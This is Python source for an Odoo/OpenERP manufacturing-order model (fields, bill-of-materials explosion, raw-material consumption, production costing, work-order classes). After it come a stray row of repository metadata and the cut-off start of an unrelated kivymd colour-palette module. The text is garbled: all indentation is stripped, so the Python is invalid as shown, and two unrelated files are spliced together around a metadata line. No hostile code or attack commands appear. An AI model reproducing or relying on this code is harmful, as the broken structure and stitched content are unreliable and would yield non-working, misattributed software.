def _src_id_default(self, cr, uid, ids, context=None):
try:
location_model, location_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
def _dest_id_default(self, cr, uid, ids, context=None):
try:
location_model, location_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
def _get_progress(self, cr, uid, ids, name, arg, context=None):
""" Return product quantity percentage """
result = dict.fromkeys(ids, 100)
for mrp_production in self.browse(cr, uid, ids, context=context):
if mrp_production.product_qty:
done = 0.0
for move in mrp_production.move_created_ids2:
if not move.scrapped and move.product_id == mrp_production.product_id:
done += move.product_qty
result[mrp_production.id] = done / mrp_production.product_qty * 100
return result
def _moves_assigned(self, cr, uid, ids, name, arg, context=None):
""" Test whether all the consume lines are assigned """
res = {}
for production in self.browse(cr, uid, ids, context=context):
res[production.id] = True
states = [x.state != 'assigned' for x in production.move_lines if x]
if any(states) or len(states) == 0: #When no moves, ready_production will be False, but test_ready will pass
res[production.id] = False
return res
def _mrp_from_move(self, cr, uid, ids, context=None):
""" Return mrp"""
res = []
for move in self.browse(cr, uid, ids, context=context):
res += self.pool.get("mrp.production").search(cr, uid, [('move_lines', 'in', move.id)], context=context)
return res
_columns = {
'name': fields.char('Reference', required=True, readonly=True, states={'draft': [('readonly', False)]}, copy=False),
'origin': fields.char('Source Document', readonly=True, states={'draft': [('readonly', False)]},
help="Reference of the document that generated this production order request.", copy=False),
'priority': fields.selection([('0', 'Not urgent'), ('1', 'Normal'), ('2', 'Urgent'), ('3', 'Very Urgent')], 'Priority',
select=True, readonly=True, states=dict.fromkeys(['draft', 'confirmed'], [('readonly', False)])),
'product_id': fields.many2one('product.product', 'Product', required=True, readonly=True, states={'draft': [('readonly', False)]},
domain=[('type','!=','service')]),
'product_qty': fields.float('Product Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True, readonly=True, states={'draft': [('readonly', False)]}),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'product_uos_qty': fields.float('Product UoS Quantity', readonly=True, states={'draft': [('readonly', False)]}),
'product_uos': fields.many2one('product.uom', 'Product UoS', readonly=True, states={'draft': [('readonly', False)]}),
'progress': fields.function(_get_progress, type='float',
string='Production progress'),
'location_src_id': fields.many2one('stock.location', 'Raw Materials Location', required=True,
readonly=True, states={'draft': [('readonly', False)]},
help="Location where the system will look for components."),
'location_dest_id': fields.many2one('stock.location', 'Finished Products Location', required=True,
readonly=True, states={'draft': [('readonly', False)]},
help="Location where the system will stock the finished products."),
'date_planned': fields.datetime('Scheduled Date', required=True, select=1, readonly=True, states={'draft': [('readonly', False)]}, copy=False),
'date_start': fields.datetime('Start Date', select=True, readonly=True, copy=False),
'date_finished': fields.datetime('End Date', select=True, readonly=True, copy=False),
'bom_id': fields.many2one('mrp.bom', 'Bill of Material', readonly=True, states={'draft': [('readonly', False)]},
help="Bill of Materials allow you to define the list of required raw materials to make a finished product."),
'routing_id': fields.many2one('mrp.routing', string='Routing', on_delete='set null', readonly=True, states={'draft': [('readonly', False)]},
help="The list of operations (list of work centers) to produce the finished product. The routing is mainly used to compute work center costs during operations and to plan future loads on work centers based on production plannification."),
'move_prod_id': fields.many2one('stock.move', 'Product Move', readonly=True, copy=False),
'move_lines': fields.one2many('stock.move', 'raw_material_production_id', 'Products to Consume',
domain=[('state', 'not in', ('done', 'cancel'))], readonly=True, states={'draft': [('readonly', False)]}),
'move_lines2': fields.one2many('stock.move', 'raw_material_production_id', 'Consumed Products',
domain=[('state', 'in', ('done', 'cancel'))], readonly=True),
'move_created_ids': fields.one2many('stock.move', 'production_id', 'Products to Produce',
domain=[('state', 'not in', ('done', 'cancel'))], readonly=True),
'move_created_ids2': fields.one2many('stock.move', 'production_id', 'Produced Products',
domain=[('state', 'in', ('done', 'cancel'))], readonly=True),
'product_lines': fields.one2many('mrp.production.product.line', 'production_id', 'Scheduled goods',
readonly=True),
'workcenter_lines': fields.one2many('mrp.production.workcenter.line', 'production_id', 'Work Centers Utilisation',
readonly=True, states={'draft': [('readonly', False)]}),
'state': fields.selection(
[('draft', 'New'), ('cancel', 'Cancelled'), ('confirmed', 'Awaiting Raw Materials'),
('ready', 'Ready to Produce'), ('in_production', 'Production Started'), ('done', 'Done')],
string='Status', readonly=True,
track_visibility='onchange', copy=False,
help="When the production order is created the status is set to 'Draft'.\n\
If the order is confirmed the status is set to 'Waiting Goods'.\n\
If any exceptions are there, the status is set to 'Picking Exception'.\n\
If the stock is available then the status is set to 'Ready to Produce'.\n\
When the production gets started then the status is set to 'In Production'.\n\
When the production is over, the status is set to 'Done'."),
'hour_total': fields.function(_production_calc, type='float', string='Total Hours', multi='workorder', store=True),
'cycle_total': fields.function(_production_calc, type='float', string='Total Cycles', multi='workorder', store=True),
'user_id': fields.many2one('res.users', 'Responsible'),
'company_id': fields.many2one('res.company', 'Company', required=True),
'ready_production': fields.function(_moves_assigned, type='boolean', store={'stock.move': (_mrp_from_move, ['state'], 10)}),
}
_defaults = {
'priority': lambda *a: '1',
'state': lambda *a: 'draft',
'date_planned': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'product_qty': lambda *a: 1.0,
'user_id': lambda self, cr, uid, c: uid,
'name': lambda x, y, z, c: x.pool.get('ir.sequence').get(y, z, 'mrp.production') or '/',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'mrp.production', context=c),
'location_src_id': _src_id_default,
'location_dest_id': _dest_id_default
}
_sql_constraints = [
('name_uniq', 'unique(name, company_id)', 'Reference must be unique per Company!'),
]
_order = 'priority desc, date_planned asc'
def _check_qty(self, cr, uid, ids, context=None):
for order in self.browse(cr, uid, ids, context=context):
if order.product_qty <= 0:
return False
return True
_constraints = [
(_check_qty, 'Order quantity cannot be negative or zero!', ['product_qty']),
]
def unlink(self, cr, uid, ids, context=None):
for production in self.browse(cr, uid, ids, context=context):
if production.state not in ('draft', 'cancel'):
raise osv.except_osv(_('Invalid Action!'), _('Cannot delete a manufacturing order in state \'%s\'.') % production.state)
return super(mrp_production, self).unlink(cr, uid, ids, context=context)
def location_id_change(self, cr, uid, ids, src, dest, context=None):
""" Changes destination location if source location is changed.
@param src: Source location id.
@param dest: Destination location id.
@return: Dictionary of values.
"""
if dest:
return {}
if src:
return {'value': {'location_dest_id': src}}
return {}
def product_id_change(self, cr, uid, ids, product_id, product_qty=0, context=None):
""" Finds UoM of changed product.
@param product_id: Id of changed product.
@return: Dictionary of values.
"""
result = {}
if not product_id:
return {'value': {
'product_uom': False,
'bom_id': False,
'routing_id': False,
'product_uos_qty': 0,
'product_uos': False
}}
bom_obj = self.pool.get('mrp.bom')
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
bom_id = bom_obj._bom_find(cr, uid, product_id=product.id, properties=[], context=context)
routing_id = False
if bom_id:
bom_point = bom_obj.browse(cr, uid, bom_id, context=context)
routing_id = bom_point.routing_id.id or False
product_uom_id = product.uom_id and product.uom_id.id or False
result['value'] = {'product_uos_qty': 0, 'product_uos': False, 'product_uom': product_uom_id, 'bom_id': bom_id, 'routing_id': routing_id}
if product.uos_id.id:
result['value']['product_uos_qty'] = product_qty * product.uos_coeff
result['value']['product_uos'] = product.uos_id.id
return result
def bom_id_change(self, cr, uid, ids, bom_id, context=None):
""" Finds routing for changed BoM.
@param product: Id of product.
@return: Dictionary of values.
"""
if not bom_id:
return {'value': {
'routing_id': False
}}
bom_point = self.pool.get('mrp.bom').browse(cr, uid, bom_id, context=context)
routing_id = bom_point.routing_id.id or False
result = {
'routing_id': routing_id
}
return {'value': result}
def _action_compute_lines(self, cr, uid, ids, properties=None, context=None):
""" Compute product_lines and workcenter_lines from BoM structure
@return: product_lines
"""
if properties is None:
properties = []
results = []
bom_obj = self.pool.get('mrp.bom')
uom_obj = self.pool.get('product.uom')
prod_line_obj = self.pool.get('mrp.production.product.line')
workcenter_line_obj = self.pool.get('mrp.production.workcenter.line')
for production in self.browse(cr, uid, ids, context=context):
#unlink product_lines
prod_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.product_lines], context=context)
#unlink workcenter_lines
workcenter_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.workcenter_lines], context=context)
# search BoM structure and route
bom_point = production.bom_id
bom_id = production.bom_id.id
if not bom_point:
bom_id = bom_obj._bom_find(cr, uid, product_id=production.product_id.id, properties=properties, context=context)
if bom_id:
bom_point = bom_obj.browse(cr, uid, bom_id)
routing_id = bom_point.routing_id.id or False
self.write(cr, uid, [production.id], {'bom_id': bom_id, 'routing_id': routing_id})
if not bom_id:
raise osv.except_osv(_('Error!'), _("Cannot find a bill of material for this product."))
# get components and workcenter_lines from BoM structure
factor = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, bom_point.product_uom.id)
# product_lines, workcenter_lines
results, results2 = bom_obj._bom_explode(cr, uid, bom_point, production.product_id, factor / bom_point.product_qty, properties, routing_id=production.routing_id.id, context=context)
# reset product_lines in production order
for line in results:
line['production_id'] = production.id
prod_line_obj.create(cr, uid, line)
#reset workcenter_lines in production order
for line in results2:
line['production_id'] = production.id
workcenter_line_obj.create(cr, uid, line)
return results
def action_compute(self, cr, uid, ids, properties=None, context=None):
""" Computes bills of material of a product.
@param properties: List containing dictionaries of properties.
@return: No. of products.
"""
return len(self._action_compute_lines(cr, uid, ids, properties=properties, context=context))
def action_cancel(self, cr, uid, ids, context=None):
""" Cancels the production order and related stock moves.
@return: True
"""
if context is None:
context = {}
move_obj = self.pool.get('stock.move')
for production in self.browse(cr, uid, ids, context=context):
if production.move_created_ids:
move_obj.action_cancel(cr, uid, [x.id for x in production.move_created_ids])
move_obj.action_cancel(cr, uid, [x.id for x in production.move_lines])
self.write(cr, uid, ids, {'state': 'cancel'})
# Put related procurements in exception
proc_obj = self.pool.get("procurement.order")
procs = proc_obj.search(cr, uid, [('production_id', 'in', ids)], context=context)
if procs:
proc_obj.write(cr, uid, procs, {'state': 'exception'}, context=context)
return True
def action_ready(self, cr, uid, ids, context=None):
""" Changes the production state to Ready and location id of stock move.
@return: True
"""
move_obj = self.pool.get('stock.move')
self.write(cr, uid, ids, {'state': 'ready'})
for production in self.browse(cr, uid, ids, context=context):
if not production.move_created_ids:
self._make_production_produce_line(cr, uid, production, context=context)
if production.move_prod_id and production.move_prod_id.location_id.id != production.location_dest_id.id:
move_obj.write(cr, uid, [production.move_prod_id.id],
{'location_id': production.location_dest_id.id})
return True
def action_production_end(self, cr, uid, ids, context=None):
""" Changes production state to Finish and writes finished date.
@return: True
"""
for production in self.browse(cr, uid, ids):
self._costs_generate(cr, uid, production)
write_res = self.write(cr, uid, ids, {'state': 'done', 'date_finished': time.strftime('%Y-%m-%d %H:%M:%S')})
# Check related procurements
proc_obj = self.pool.get("procurement.order")
procs = proc_obj.search(cr, uid, [('production_id', 'in', ids)], context=context)
proc_obj.check(cr, uid, procs, context=context)
return write_res
def test_production_done(self, cr, uid, ids):
""" Tests whether production is done or not.
@return: True or False
"""
res = True
for production in self.browse(cr, uid, ids):
if production.move_lines:
res = False
if production.move_created_ids:
res = False
return res
def _get_subproduct_factor(self, cr, uid, production_id, move_id=None, context=None):
""" Compute the factor to compute the qty of procucts to produce for the given production_id. By default,
it's always equal to the quantity encoded in the production order or the production wizard, but if the
module mrp_subproduct is installed, then we must use the move_id to identify the product to produce
and its quantity.
:param production_id: ID of the mrp.order
:param move_id: ID of the stock move that needs to be produced. Will be used in mrp_subproduct.
:return: The factor to apply to the quantity that we should produce for the given production order.
"""
return 1
def _get_produced_qty(self, cr, uid, production, context=None):
''' returns the produced quantity of product 'production.product_id' for the given production, in the product UoM
'''
produced_qty = 0
for produced_product in production.move_created_ids2:
if (produced_product.scrapped) or (produced_product.product_id.id != production.product_id.id):
continue
produced_qty += produced_product.product_qty
return produced_qty
def _get_consumed_data(self, cr, uid, production, context=None):
''' returns a dictionary containing for each raw material of the given production, its quantity already consumed (in the raw material UoM)
'''
consumed_data = {}
# Calculate already consumed qtys
for consumed in production.move_lines2:
if consumed.scrapped:
continue
if not consumed_data.get(consumed.product_id.id, False):
consumed_data[consumed.product_id.id] = 0
consumed_data[consumed.product_id.id] += consumed.product_qty
return consumed_data
def _calculate_qty(self, cr, uid, production, product_qty=0.0, context=None):
"""
Calculates the quantity still needed to produce an extra number of products
product_qty is in the uom of the product
"""
quant_obj = self.pool.get("stock.quant")
uom_obj = self.pool.get("product.uom")
produced_qty = self._get_produced_qty(cr, uid, production, context=context)
consumed_data = self._get_consumed_data(cr, uid, production, context=context)
#In case no product_qty is given, take the remaining qty to produce for the given production
if not product_qty:
product_qty = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, production.product_id.uom_id.id) - produced_qty
production_qty = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, production.product_id.uom_id.id)
scheduled_qty = {}
for scheduled in production.product_lines:
if scheduled.product_id.type == 'service':
continue
qty = uom_obj._compute_qty(cr, uid, scheduled.product_uom.id, scheduled.product_qty, scheduled.product_id.uom_id.id)
if scheduled_qty.get(scheduled.product_id.id):
scheduled_qty[scheduled.product_id.id] += qty
else:
scheduled_qty[scheduled.product_id.id] = qty
dicts = {}
# Find product qty to be consumed and consume it
for product_id in scheduled_qty.keys():
consumed_qty = consumed_data.get(product_id, 0.0)
# qty available for consume and produce
sched_product_qty = scheduled_qty[product_id]
qty_avail = sched_product_qty - consumed_qty
if qty_avail <= 0.0:
# there will be nothing to consume for this raw material
continue
if not dicts.get(product_id):
dicts[product_id] = {}
# total qty of consumed product we need after this consumption
if product_qty + produced_qty <= production_qty:
total_consume = ((product_qty + produced_qty) * sched_product_qty / production_qty)
else:
total_consume = sched_product_qty
qty = total_consume - consumed_qty
# Search for quants related to this related move
for move in production.move_lines:
if qty <= 0.0:
break
if move.product_id.id != product_id:
continue
q = min(move.product_qty, qty)
quants = quant_obj.quants_get_prefered_domain(cr, uid, move.location_id, move.product_id, q, domain=[('qty', '>', 0.0)],
prefered_domain_list=[[('reservation_id', '=', move.id)]], context=context)
for quant, quant_qty in quants:
if quant:
lot_id = quant.lot_id.id
if not product_id in dicts.keys():
dicts[product_id] = {lot_id: quant_qty}
elif lot_id in dicts[product_id].keys():
dicts[product_id][lot_id] += quant_qty
else:
dicts[product_id][lot_id] = quant_qty
qty -= quant_qty
if qty > 0:
if dicts[product_id].get(False):
dicts[product_id][False] += qty
else:
dicts[product_id][False] = qty
consume_lines = []
for prod in dicts.keys():
for lot, qty in dicts[prod].items():
consume_lines.append({'product_id': prod, 'product_qty': qty, 'lot_id': lot})
return consume_lines
def action_produce(self, cr, uid, production_id, production_qty, production_mode, wiz=False, context=None):
""" To produce final product based on production mode (consume/consume&produce).
If Production mode is consume, all stock move lines of raw materials will be done/consumed.
If Production mode is consume & produce, all stock move lines of raw materials will be done/consumed
and stock move lines of final product will be also done/produced.
@param production_id: the ID of mrp.production object
@param production_qty: specify qty to produce in the uom of the production order
@param production_mode: specify production mode (consume/consume&produce).
@param wiz: the mrp produce product wizard, which will tell the amount of consumed products needed
@return: True
"""
stock_mov_obj = self.pool.get('stock.move')
uom_obj = self.pool.get("product.uom")
production = self.browse(cr, uid, production_id, context=context)
production_qty_uom = uom_obj._compute_qty(cr, uid, production.product_uom.id, production_qty, production.product_id.uom_id.id)
main_production_move = False
if production_mode == 'consume_produce':
# To produce remaining qty of final product
produced_products = {}
for produced_product in production.move_created_ids2:
if produced_product.scrapped:
continue
if not produced_products.get(produced_product.product_id.id, False):
produced_products[produced_product.product_id.id] = 0
produced_products[produced_product.product_id.id] += produced_product.product_qty
for produce_product in production.move_created_ids:
subproduct_factor = self._get_subproduct_factor(cr, uid, production.id, produce_product.id, context=context)
lot_id = False
if wiz:
lot_id = wiz.lot_id.id
qty = min(subproduct_factor * production_qty_uom, produce_product.product_qty) #Needed when producing more than maximum quantity
new_moves = stock_mov_obj.action_consume(cr, uid, [produce_product.id], qty,
location_id=produce_product.location_id.id, restrict_lot_id=lot_id, context=context)
stock_mov_obj.write(cr, uid, new_moves, {'production_id': production_id}, context=context)
remaining_qty = subproduct_factor * production_qty_uom - qty
if remaining_qty: # In case you need to make more than planned
#consumed more in wizard than previously planned
extra_move_id = stock_mov_obj.copy(cr, uid, produce_product.id, default={'state': 'confirmed',
'product_uom_qty': remaining_qty,
'production_id': production_id}, context=context)
if extra_move_id:
stock_mov_obj.action_done(cr, uid, [extra_move_id], context=context)
if produce_product.product_id.id == production.product_id.id:
main_production_move = produce_product.id
if production_mode in ['consume', 'consume_produce']:
if wiz:
consume_lines = []
for cons in wiz.consume_lines:
consume_lines.append({'product_id': cons.product_id.id, 'lot_id': cons.lot_id.id, 'product_qty': cons.product_qty})
else:
consume_lines = self._calculate_qty(cr, uid, production, production_qty_uom, context=context)
for consume in consume_lines:
remaining_qty = consume['product_qty']
for raw_material_line in production.move_lines:
if remaining_qty <= 0:
break
if consume['product_id'] != raw_material_line.product_id.id:
continue
consumed_qty = min(remaining_qty, raw_material_line.product_qty)
stock_mov_obj.action_consume(cr, uid, [raw_material_line.id], consumed_qty, raw_material_line.location_id.id,
restrict_lot_id=consume['lot_id'], consumed_for=main_production_move, context=context)
remaining_qty -= consumed_qty
if remaining_qty:
#consumed more in wizard than previously planned
product = self.pool.get('product.product').browse(cr, uid, consume['product_id'], context=context)
extra_move_id = self._make_consume_line_from_data(cr, uid, production, product, product.uom_id.id, remaining_qty, False, 0, context=context)
if extra_move_id:
if consume['lot_id']:
stock_mov_obj.write(cr, uid, [extra_move_id], {'restrict_lot_id': consume['lot_id']}, context=context)
stock_mov_obj.action_done(cr, uid, [extra_move_id], context=context)
self.message_post(cr, uid, production_id, body=_("%s produced") % self._description, context=context)
self.signal_workflow(cr, uid, [production_id], 'button_produce_done')
return True
def _costs_generate(self, cr, uid, production):
""" Calculates total costs at the end of the production.
@param production: Id of production order.
@return: Calculated amount.
"""
amount = 0.0
analytic_line_obj = self.pool.get('account.analytic.line')
for wc_line in production.workcenter_lines:
wc = wc_line.workcenter_id
if wc.costs_journal_id and wc.costs_general_account_id:
# Cost per hour
value = wc_line.hour * wc.costs_hour
account = wc.costs_hour_account_id.id
if value and account:
amount += value
# we user SUPERUSER_ID as we do not garantee an mrp user
# has access to account analytic lines but still should be
# able to produce orders
analytic_line_obj.create(cr, SUPERUSER_ID, {
'name': wc_line.name + ' (H)',
'amount': value,
'account_id': account,
'general_account_id': wc.costs_general_account_id.id,
'journal_id': wc.costs_journal_id.id,
'ref': wc.code,
'product_id': wc.product_id.id,
'unit_amount': wc_line.hour,
'product_uom_id': wc.product_id and wc.product_id.uom_id.id or False
})
# Cost per cycle
value = wc_line.cycle * wc.costs_cycle
account = wc.costs_cycle_account_id.id
if value and account:
amount += value
analytic_line_obj.create(cr, SUPERUSER_ID, {
'name': wc_line.name + ' (C)',
'amount': value,
'account_id': account,
'general_account_id': wc.costs_general_account_id.id,
'journal_id': wc.costs_journal_id.id,
'ref': wc.code,
'product_id': wc.product_id.id,
'unit_amount': wc_line.cycle,
'product_uom_id': wc.product_id and wc.product_id.uom_id.id or False
})
return amount
def action_in_production(self, cr, uid, ids, context=None):
""" Changes state to In Production and writes starting date.
@return: True
"""
return self.write(cr, uid, ids, {'state': 'in_production', 'date_start': time.strftime('%Y-%m-%d %H:%M:%S')})
def consume_lines_get(self, cr, uid, ids, *args):
res = []
for order in self.browse(cr, uid, ids, context={}):
res += [x.id for x in order.move_lines]
return res
def test_ready(self, cr, uid, ids):
res = True
for production in self.browse(cr, uid, ids):
if production.move_lines and not production.ready_production:
res = False
return res
def _make_production_produce_line(self, cr, uid, production, context=None):
stock_move = self.pool.get('stock.move')
proc_obj = self.pool.get('procurement.order')
source_location_id = production.product_id.property_stock_production.id
destination_location_id = production.location_dest_id.id
procs = proc_obj.search(cr, uid, [('production_id', '=', production.id)], context=context)
procurement_id = procs and procs[0] or False
data = {
'name': production.name,
'date': production.date_planned,
'product_id': production.product_id.id,
'product_uom': production.product_uom.id,
'product_uom_qty': production.product_qty,
'product_uos_qty': production.product_uos and production.product_uos_qty or False,
'product_uos': production.product_uos and production.product_uos.id or False,
'location_id': source_location_id,
'location_dest_id': destination_location_id,
'move_dest_id': production.move_prod_id.id,
'procurement_id': procurement_id,
'company_id': production.company_id.id,
'production_id': production.id,
'origin': production.name,
}
move_id = stock_move.create(cr, uid, data, context=context)
#a phantom bom cannot be used in mrp order so it's ok to assume the list returned by action_confirm
#is 1 element long, so we can take the first.
return stock_move.action_confirm(cr, uid, [move_id], context=context)[0]
def _get_raw_material_procure_method(self, cr, uid, product, context=None):
'''This method returns the procure_method to use when creating the stock move for the production raw materials'''
warehouse_obj = self.pool['stock.warehouse']
try:
mto_route = warehouse_obj._get_mto_route(cr, uid, context=context)
except:
return "make_to_stock"
routes = product.route_ids + product.categ_id.total_route_ids
if mto_route in [x.id for x in routes]:
return "make_to_order"
return "make_to_stock"
def _create_previous_move(self, cr, uid, move_id, product, source_location_id, dest_location_id, context=None):
'''
When the routing gives a different location than the raw material location of the production order,
we should create an extra move from the raw material location to the location of the routing, which
precedes the consumption line (chained). The picking type depends on the warehouse in which this happens
and the type of locations.
'''
loc_obj = self.pool.get("stock.location")
stock_move = self.pool.get('stock.move')
type_obj = self.pool.get('stock.picking.type')
# Need to search for a picking type
move = stock_move.browse(cr, uid, move_id, context=context)
src_loc = loc_obj.browse(cr, uid, source_location_id, context=context)
dest_loc = loc_obj.browse(cr, uid, dest_location_id, context=context)
code = stock_move.get_code_from_locs(cr, uid, move, src_loc, dest_loc, context=context)
if code == 'outgoing':
check_loc = src_loc
else:
check_loc = dest_loc
wh = loc_obj.get_warehouse(cr, uid, check_loc, context=context)
domain = [('code', '=', code)]
if wh:
domain += [('warehouse_id', '=', wh)]
types = type_obj.search(cr, uid, domain, context=context)
move = stock_move.copy(cr, uid, move_id, default = {
'location_id': source_location_id,
'location_dest_id': dest_location_id,
'procure_method': self._get_raw_material_procure_method(cr, uid, product, context=context),
'raw_material_production_id': False,
'move_dest_id': move_id,
'picking_type_id': types and types[0] or False,
}, context=context)
return move
def _make_consume_line_from_data(self, cr, uid, production, product, uom_id, qty, uos_id, uos_qty, context=None):
stock_move = self.pool.get('stock.move')
loc_obj = self.pool.get('stock.location')
# Internal shipment is created for Stockable and Consumer Products
if product.type not in ('product', 'consu'):
return False
# Take routing location as a Source Location.
source_location_id = production.location_src_id.id
prod_location_id = source_location_id
prev_move= False
if production.bom_id.routing_id and production.bom_id.routing_id.location_id and production.bom_id.routing_id.location_id.id != source_location_id:
source_location_id = production.bom_id.routing_id.location_id.id
prev_move = True
destination_location_id = production.product_id.property_stock_production.id
move_id = stock_move.create(cr, uid, {
'name': production.name,
'date': production.date_planned,
'product_id': product.id,
'product_uom_qty': qty,
'product_uom': uom_id,
'product_uos_qty': uos_id and uos_qty or False,
'product_uos': uos_id or False,
'location_id': source_location_id,
'location_dest_id': destination_location_id,
'company_id': production.company_id.id,
'procure_method': prev_move and 'make_to_stock' or self._get_raw_material_procure_method(cr, uid, product, context=context), #Make_to_stock avoids creating procurement
'raw_material_production_id': production.id,
#this saves us a browse in create()
'price_unit': product.standard_price,
'origin': production.name,
'warehouse_id': loc_obj.get_warehouse(cr, uid, production.location_src_id, context=context),
}, context=context)
if prev_move:
prev_move = self._create_previous_move(cr, uid, move_id, product, prod_location_id, source_location_id, context=context)
stock_move.action_confirm(cr, uid, [prev_move], context=context)
return move_id
def _make_production_consume_line(self, cr, uid, line, context=None):
return self._make_consume_line_from_data(cr, uid, line.production_id, line.product_id, line.product_uom.id, line.product_qty, line.product_uos.id, line.product_uos_qty, context=context)
def _make_service_procurement(self, cr, uid, line, context=None):
prod_obj = self.pool.get('product.product')
if prod_obj.need_procurement(cr, uid, [line.product_id.id], context=context):
vals = {
'name': line.production_id.name,
'origin': line.production_id.name,
'company_id': line.production_id.company_id.id,
'date_planned': line.production_id.date_planned,
'product_id': line.product_id.id,
'product_qty': line.product_qty,
'product_uom': line.product_uom.id,
'product_uos_qty': line.product_uos_qty,
'product_uos': line.product_uos.id,
}
proc_obj = self.pool.get("procurement.order")
proc = proc_obj.create(cr, uid, vals, context=context)
proc_obj.run(cr, uid, [proc], context=context)
def action_confirm(self, cr, uid, ids, context=None):
""" Confirms production order.
@return: Newly generated Shipment Id.
"""
uncompute_ids = filter(lambda x: x, [not x.product_lines and x.id or False for x in self.browse(cr, uid, ids, context=context)])
self.action_compute(cr, uid, uncompute_ids, context=context)
for production in self.browse(cr, uid, ids, context=context):
self._make_production_produce_line(cr, uid, production, context=context)
stock_moves = []
for line in production.product_lines:
if line.product_id.type != 'service':
stock_move_id = self._make_production_consume_line(cr, uid, line, context=context)
stock_moves.append(stock_move_id)
else:
self._make_service_procurement(cr, uid, line, context=context)
if stock_moves:
self.pool.get('stock.move').action_confirm(cr, uid, stock_moves, context=context)
production.write({'state': 'confirmed'}, context=context)
return 0
def action_assign(self, cr, uid, ids, context=None):
"""
Checks the availability on the consume lines of the production order
"""
from openerp import workflow
move_obj = self.pool.get("stock.move")
for production in self.browse(cr, uid, ids, context=context):
move_obj.action_assign(cr, uid, [x.id for x in production.move_lines], context=context)
if self.pool.get('mrp.production').test_ready(cr, uid, [production.id]):
workflow.trg_validate(uid, 'mrp.production', production.id, 'moves_ready', cr)
def force_production(self, cr, uid, ids, *args):
""" Assigns products.
@param *args: Arguments
@return: True
"""
from openerp import workflow
move_obj = self.pool.get('stock.move')
for order in self.browse(cr, uid, ids):
move_obj.force_assign(cr, uid, [x.id for x in order.move_lines])
if self.pool.get('mrp.production').test_ready(cr, uid, [order.id]):
workflow.trg_validate(uid, 'mrp.production', order.id, 'moves_ready', cr)
return True
class mrp_production_workcenter_line(osv.osv):
_name = 'mrp.production.workcenter.line'
_description = 'Work Order'
_order = 'sequence'
_inherit = ['mail.thread']
_columns = {
'name': fields.char('Work Order', required=True),
'workcenter_id': fields.many2one('mrp.workcenter', 'Work Center', required=True),
'cycle': fields.float('Number of Cycles', digits=(16, 2)),
'hour': fields.float('Number of Hours', digits=(16, 2)),
'sequence': fields.integer('Sequence', required=True, help="Gives the sequence order when displaying a list of work orders."),
'production_id': fields.many2one('mrp.production', 'Manufacturing Order',
track_visibility='onchange', select=True, ondelete='cascade', required=True),
}
_defaults = {
'sequence': lambda *a: 1,
'hour': lambda *a: 0,
'cycle': lambda *a: 0,
}
class mrp_production_product_line(osv.osv):
_name = 'mrp.production.product.line'
_description = 'Production Scheduled Product'
_columns = {
'name': fields.char('Name', required=True),
'product_id': fields.many2one('product.product', 'Product', required=True),
'product_qty': fields.float('Product Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True),
'product_uos_qty': fields.float('Product UOS Quantity'),
'product_uos': fields.many2one('product.uom', 'Product UOS'),
'production_id': fields.many2one('mrp.production', 'Production Order', select=True),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 55.004796 | 296 | 0.623127 |
68248ac2d1682f92f828c55915f6ad28252796d0 | 21,214 | py | Python | kivymd/color_definitions.py | mahonec/KivyMD | 6f1515112852e2b21ef227cd8df8f87910ed92b6 | [
"MIT"
] | 1 | 2020-07-01T12:39:51.000Z | 2020-07-01T12:39:51.000Z | kivymd/color_definitions.py | mahonec/KivyMD | 6f1515112852e2b21ef227cd8df8f87910ed92b6 | [
"MIT"
] | 1 | 2020-05-15T10:09:15.000Z | 2020-05-15T10:09:15.000Z | kivymd/color_definitions.py | mahonec/KivyMD | 6f1515112852e2b21ef227cd8df8f87910ed92b6 | [
"MIT"
] | null | null | null | """
Themes/Color Definitions
========================
.. seealso::
`Material Design spec, The color system <https://material.io/design/color/the-color-system.html>`_
Material colors palette to use in :class:`kivymd.theming.ThemeManager`.
:data:`~colors` is a dict-in-dict where the first key is a value from
:data:`~palette` and the second key is a value from :data:`~hue`. Color is a hex
value, a string of 6 characters (0-9, A-F) written in uppercase.
For example, ``colors["Red"]["900"]`` is ``"B71C1C"``.
"""
colors = {
"Red": {
"50": "FFEBEE",
"100": "FFCDD2",
"200": "EF9A9A",
"300": "E57373",
"400": "EF5350",
"500": "F44336",
"600": "E53935",
"700": "D32F2F",
"800": "C62828",
"900": "B71C1C",
"A100": "FF8A80",
"A200": "FF5252",
"A400": "FF1744",
"A700": "D50000",
},
"Pink": {
"50": "FCE4EC",
"100": "F8BBD0",
"200": "F48FB1",
"300": "F06292",
"400": "EC407A",
"500": "E91E63",
"600": "D81B60",
"700": "C2185B",
"800": "AD1457",
"900": "880E4F",
"A100": "FF80AB",
"A200": "FF4081",
"A400": "F50057",
"A700": "C51162",
},
"Purple": {
"50": "F3E5F5",
"100": "E1BEE7",
"200": "CE93D8",
"300": "BA68C8",
"400": "AB47BC",
"500": "9C27B0",
"600": "8E24AA",
"700": "7B1FA2",
"800": "6A1B9A",
"900": "4A148C",
"A100": "EA80FC",
"A200": "E040FB",
"A400": "D500F9FF",
},
"DeepPurple": {
"50": "EDE7F6",
"100": "D1C4E9",
"200": "B39DDB",
"300": "9575CD",
"400": "7E57C2",
"500": "673AB7",
"600": "5E35B1",
"700": "512DA8",
"800": "4527A0",
"900": "311B92",
"A100": "B388FF",
"A200": "7C4DFF",
"A400": "651FFF",
"A700": "6200EA",
},
"Indigo": {
"50": "E8EAF6",
"100": "C5CAE9",
"200": "9FA8DA",
